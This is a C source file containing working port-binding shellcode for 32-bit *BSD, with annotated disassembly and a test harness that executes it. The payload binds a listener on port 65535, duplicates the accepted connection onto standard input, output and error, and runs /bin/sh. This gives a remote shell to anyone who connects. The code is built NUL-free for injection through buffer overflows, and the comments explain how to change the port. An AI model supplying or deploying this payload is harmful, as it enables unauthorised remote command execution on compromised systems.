/*
 * portbind, execve /bin/sh *BSD x86 shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "bind execve /bin/sh /bin/sh 0 to port 65535"

#include <stdio.h>
#include <string.h>

/*
 * Port-binding /bin/sh shellcode for 32-bit *BSD (int $0x80 ABI).
 *
 * Layout: the leading jmp goes to G2C, whose call pushes the address of the
 * trailing "/bin/sh" bytes and jumps back; the `pop %esi` then leaves %esi
 * pointing at that string.  Every syscall is made BSD-style: arguments are
 * pushed right-to-left, the syscall number is loaded into %eax and pushed
 * once more to occupy the dummy return-address slot of the BSD convention,
 * then int $0x80 is issued.
 *
 * Syscall numbers used (FreeBSD/OpenBSD/NetBSD share them): socket 0x61,
 * bind 0x68, listen 0x6a, accept 0x1e, dup2 0x5a, execve 0x3b.
 *
 * Properties a user should know:
 *   - 132 bytes, no NUL bytes (so it survives strcpy-style copies).
 *   - Self-modifying: it writes the terminating NUL of "/bin/sh" at
 *     %esi+7 and builds the sockaddr_in (16 bytes at %esi+8) and later
 *     argv (two dwords at %esi+8) in place.  %esi+8 is already one past
 *     the end of this string, so the payload needs 16 writable bytes of
 *     slack after it and must sit in memory that is both writable and
 *     executable (a W^X mapping will fault before socket() is reached).
 *   - The listening port is hard-coded in the movw under "bind" (0xffff,
 *     stored in network byte order); the bind address is INADDR_ANY.
 *   - accept() is called once; nothing checks the return value of any
 *     syscall, so a failure (e.g. port in use) falls through to execve.
 */
char shellcode[] =

/* jump to G2C (the call there pushes the address of "/bin/sh") */
"\xeb\x76"			// jmp    80480f8 <G2C>

/* start <shellcode>: %esi <- address of "/bin/sh" */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x07"			// mov    %al,0x7(%esi)   NUL-terminate "/bin/sh" (writes into the payload itself)

/* socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6) */
"\x6a\x06"			// push   $0x6
"\x6a\x01"			// push   $0x1
"\x6a\x02"			// push   $0x2
"\xb0\x61"			// mov    $0x61,%al       SYS_socket
"\x50"				// push   %eax            dummy return-address slot
"\xcd\x80"			// int    $0x80           %eax = listening socket fd

/* bind(sockfd, {sin_family=AF_INET, sin_port=0xffff, sin_addr=0}, 16) */
"\x89\xc2"			// mov    %eax,%edx       sockfd kept in %edx, %ecx, %ebx
"\x89\xc1"			// mov    %eax,%ecx
"\x89\xc3"			// mov    %eax,%ebx
"\x31\xc0"			// xor    %eax,%eax
"\xc6\x46\x09\x02"		// movb   $0x2,0x9(%esi)  sin_family = AF_INET (sin_len at 0x8 is left untouched; presumably ignored/overwritten by the kernel - confirm)
"\x66\xc7\x46\x0a\xff\xff"	// movw   $0xffff,0xa(%esi) sin_port (port: 65535 -> 0xffff); change these two bytes to pick another port
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)  sin_addr = INADDR_ANY
"\x6a\x10"			// push   $0x10           addrlen = sizeof(struct sockaddr_in)
"\x8d\x46\x08"			// lea    0x8(%esi),%eax  &sockaddr (scratch area past the string)
"\x50"				// push   %eax
"\x52"				// push   %edx            sockfd
"\x31\xc0"			// xor    %eax,%eax
"\xb0\x68"			// mov    $0x68,%al       SYS_bind
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* listen(sockfd, 1) */
"\x6a\x01"			// push   $0x1            backlog
"\x51"				// push   %ecx            sockfd
"\x31\xc0"			// xor    %eax,%eax
"\xb0\x6a"			// mov    $0x6a,%al       SYS_listen
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* accept(sockfd, NULL, NULL) - blocks until a client connects */
"\x31\xc0"			// xor    %eax,%eax
"\x50"				// push   %eax            addrlen = NULL
"\x50"				// push   %eax            addr = NULL
"\x53"				// push   %ebx            sockfd
"\xb0\x1e"			// mov    $0x1e,%al       SYS_accept
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80           %eax = client fd

/* dup2(clientfd, 0) */
"\x89\xc1"			// mov    %eax,%ecx       clientfd kept in %ecx
"\x31\xc0"			// xor    %eax,%eax
"\x50"				// push   %eax            newfd = 0 (stdin)
"\x51"				// push   %ecx            oldfd = clientfd
"\xb0\x5a"			// mov    $0x5a,%al       SYS_dup2
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* dup2(clientfd, 1) */
"\x6a\x01"			// push   $0x1            newfd = 1 (stdout)
"\x51"				// push   %ecx
"\xb0\x5a"			// mov    $0x5a,%al       only %al is reloaded: relies on the previous dup2 leaving a value < 256 in %eax
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* dup2(clientfd, 2) */
"\x6a\x02"			// push   $0x2            newfd = 2 (stderr)
"\x51"				// push   %ecx
"\xb0\x5a"			// mov    $0x5a,%al       same low-byte-only reload as above
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* execve("/bin/sh", {"/bin/sh", NULL}, NULL) */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x76\x08"			// mov    %esi,0x8(%esi)  argv[0] = "/bin/sh" (reuses the sockaddr scratch area)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)  argv[1] = NULL
"\x50"				// push   %eax            envp = NULL
"\x8d\x56\x08"			// lea    0x8(%esi),%edx  argv
"\x52"				// push   %edx
"\x56"				// push   %esi            path = "/bin/sh"
"\xb0\x3b"			// mov    $0x3b,%al       SYS_execve
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80           does not return on success

/* G2C: call back to the start so the string address ends up on the stack */
"\xe8\x85\xff\xff\xff"		// call   8048082 <shellcode>
/* The remaining bytes are the string "/bin/sh" (no NUL; the code writes it
 * at run time).  The disassembler misreads them as das/bound/das/jae. */
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    804816c <G2C+0x74>
;

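/*
 * Test harness: print the payload's description and length, then transfer
 * control to it.
 *
 * The original version overwrote main's saved return address through
 * `(int *)&ret + 2`, which is undefined behaviour and only works for one
 * particular frame layout (frame pointer present, no stack protector,
 * 32-bit pointers so that `(int)shellcode` does not truncate).  Calling the
 * array through a function pointer reaches the same entry point without
 * depending on the compiler's frame layout.
 *
 * The shellcode patches its own bytes (it writes the NUL of "/bin/sh" and
 * builds a sockaddr/argv just past the end of the string), so `shellcode[]`
 * must live in a mapping that is both writable and executable; on systems
 * that enforce W^X this harness faults before the payload runs.
 *
 * Returns 0 only if the shellcode returns, which it does not on success
 * (execve replaces the process).
 */
int
main(void)
{
	/* Object-to-function pointer conversion is a common extension, not
	 * strict ISO C; it is what every shellcode tester relies on. */
	void (*entry)(void) = (void (*)(void))shellcode;

	printf("Shellcode info = %s\n", info);
	/* strlen() stops at the first NUL, so this equals the full payload
	 * size only because the payload is NUL-free.  %zu matches size_t. */
	printf("Shellcode length = %zu\n", strlen(shellcode));
	entry();
	return 0;
}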
